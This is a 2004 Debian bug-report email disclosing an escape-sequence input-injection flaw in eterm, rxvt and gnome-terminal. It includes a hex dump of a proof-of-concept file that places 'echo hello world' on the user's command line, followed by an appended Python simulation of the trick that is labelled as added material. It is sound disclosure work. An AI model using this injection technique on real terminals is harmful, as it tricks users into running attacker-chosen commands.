Bug#244811: Bug#244808: Processed: Annotating

Jan Minar <jjminar@fastmail.fm>, 244811@bugs.debian.org
Tue, 20 Apr 2004 22:21:39 +0200

Would it be possible to join the three bugs, as even the codebase is
very similar (xterm descendant; BTW xterm is not vulnerable anymore):

#244808: eterm: Arbitrary command execution a.o. via escape sequencies
#244810: rxvt: Arbitrary command execution a.o. via escape sequencies
#244811: gnome-terminal: Arbitrary command execution a.o. via escape sequencies

On Tue, Apr 20, 2004 at 12:59:03PM -0400, Laurence J. Lane wrote:
> On Tue, Apr 20, 2004 at 09:52:18AM -0700, Matt Zimmerman wrote:
>
> > > CAN-2003-0068 suggests an Eterm 0.9.1 and earlier problem. I
> > > have confirm it for woody and prepare a patch if necessary.
>         ^ to
>
> > I am not sure I understand you clearly.  Which of these:
>
> > - You have confirmed that woody is vulnerable
> > - You have confirmed that woody is not vulnerable
> > - You will attempt to determine whether woody is vulnerable

Of course the file writing is not possible:

>>> ESC ] n ; string BEL      n == 30: Dump contents of scrollback to file

(jan@kontryhel)(2811/pts)(09:44pm:04/20/04)-
(%:~/sandbox)- echo -ne '\033]n;foo\a'
(jan@kontryhel)(2812/pts)(09:44pm:04/20/04)-
(%:~/sandbox)- ls
(jan@kontryhel)(2813/pts)(09:44pm:04/20/04)-
(%:~/sandbox)-


But it's still possible to insert arbitrary characters in the input
stream:

(jan@kontryhel)(2883/pts)(10:09pm:04/20/04)-
(%:~)- xxd sploit4
0000000: 1b5d 323b 3b65 6368 6f20 6865 6c6c 6f20  .]2;;echo hello 
0000010: 776f 726c 643b 3a20 506c 6561 7365 2070  world;: Please p
0000020: 7265 7373 203c 5265 7475 726e 3e2e 2e2e  ress <Return>...
0000030: 071b 5b32 3174 0a                        ..[21t.
(jan@kontryhel)(2884/pts)(10:09pm:04/20/04)-
(%:~)- cat sploit4

(jan@kontryhel)(2885/pts)(10:09pm:04/20/04)-
(%:~)- l;echo hello world;: Please press <Return>...
       ^^^^^^This is as-if typed by the user.^^^^^^^

If the user really presses <Ret>, zsh will execute the command `l', or
change the directory to ~jan/l (heh, my case).  Then the helloworld
payload is executed.  The only thing the attacker has to do is
persuade the user to _approve_ the execution of the payload.  As the
attacker controls the whole display, this will be fairly easy.

The main problem is the user cannot tell whether she is being deceived
by a rogue file.  Normally, this would not be a problem, as just one
more <Return> on an empty command line is not an issue.  But now, the
command line is not empty; it contains the payload, which will get
executed with the privileges of the user.

There are other, less nasty escape sequences, as I wrote in the original
bug report.

Jan.

-- 
   "To me, clowns aren't funny. In fact, they're kind of scary. I've wondered
 where this started and I think it goes back to the time I went to the circus,
			  and a clown killed my dad."
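The title-echo trick in the sploit4 demo above, as an added example that is not part of the bug report or of any of the three terminals' code: a toy terminal emulator in Python that understands only the two control sequences the payload uses, OSC 2 (set window title) and CSI 21 t (report window title), and shows what lands in the shell's input stream when title reporting is allowed versus refused. The reply format OSC l <title> ST is taken from the xterm control-sequence documentation; the `allow_window_ops` switch and the `as_typed` helper (which drops the ESC ] / ESC \ framing that did not show up on the command line in the demo) are this example's own assumptions, not a description of any real terminal's internals.

```python
"""Toy terminal: why `cat sploit4` ends with a command line the user never typed.

Added example, not code from the bug report.  Handles exactly two sequences:
  ESC ] 2 ; title BEL   -> set the window title (every xterm descendant does this)
  ESC [ 21 t            -> report the window title; xterm answers ESC ] l title ESC \
The answer is written to the pty, i.e. it becomes *input* to the shell.
"""
import re

ESC = "\x1b"
BEL = "\x07"
ST = ESC + "\\"          # string terminator

# Constructed payload: byte-for-byte what the xxd dump of sploit4 shows.
SPLOIT4 = (ESC + "]2;;echo hello world;: Please press <Return>..." + BEL
           + ESC + "[21t" + "\n")

OSC_RE = re.compile(r"\x1b\](\d+);(.*?)(?:\x07|\x1b\\)", re.S)
CSI_RE = re.compile(r"\x1b\[([0-9;]*)([@-~])")


class ToyTerminal:
    def __init__(self, allow_window_ops):
        # Assumed knob: modelled on xterm's allowWindowOps resource, which
        # gates the title report.  Real terminals differ in name and default.
        self.allow_window_ops = allow_window_ops
        self.title = "xterm"
        self.display = ""    # what the user sees on screen
        self.input = ""      # what the terminal feeds to the shell's stdin

    def feed(self, data):
        i = 0
        while i < len(data):
            if data.startswith(ESC + "]", i):
                m = OSC_RE.match(data, i)
                if m:
                    self._osc(int(m.group(1)), m.group(2))
                    i = m.end()
                    continue
            if data.startswith(ESC + "[", i):
                m = CSI_RE.match(data, i)
                if m:
                    self._csi(m.group(1), m.group(2))
                    i = m.end()
                    continue
            self.display += data[i]      # ordinary text: just draw it
            i += 1

    def _osc(self, ps, text):
        if ps in (0, 2):                 # icon name / window title
            self.title = text            # attacker-controlled, silently

    def _csi(self, params, final):
        if final == "t" and params == "21":
            if self.allow_window_ops:
                # Vulnerable behaviour: echo the title back as input.
                self.input += ESC + "]l" + self.title + ST
            # Hardened behaviour: refuse to report, write nothing.


def run_sploit(allow_window_ops):
    """Feed sploit4 to a terminal; return (screen output, bytes sent to the shell)."""
    term = ToyTerminal(allow_window_ops)
    term.feed(SPLOIT4)
    return term.display, term.input


def as_typed(shell_input):
    """Assumption from the demo: the line editor swallows the ESC ] and ESC \\ framing,
    leaving the 'l' and the title text on the command line as if the user typed it."""
    return re.sub(r"\x1b\]|\x1b\\", "", shell_input)


def commands_on_return(line):
    """Rough split of what a Bourne-style shell would run if <Return> were pressed."""
    return [c.strip() for c in line.split(";") if c.strip()]


if __name__ == "__main__":
    for allow in (True, False):
        screen, to_shell = run_sploit(allow)
        print("allow_window_ops=%s" % allow)
        print("  screen shows   : %r" % screen)
        print("  shell receives : %r" % to_shell)
        print("  command line   : %r" % as_typed(to_shell))
        print("  would execute  : %r" % commands_on_return(as_typed(to_shell)))
```

With `allow_window_ops=True` the screen shows only a newline (a `cat` of the file looks harmless) while the shell receives `ESC ] l ;echo hello world;: Please press <Return>... ESC \`, which the split turns into `l`, `echo hello world`, and a `:` no-op that carries the social-engineering text; with it off, the title is still changed but nothing is written back, so the command line stays empty. The same structure applies to any terminal query whose answer is typed into the pty: the defence is to refuse the report, not to sanitise the title.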
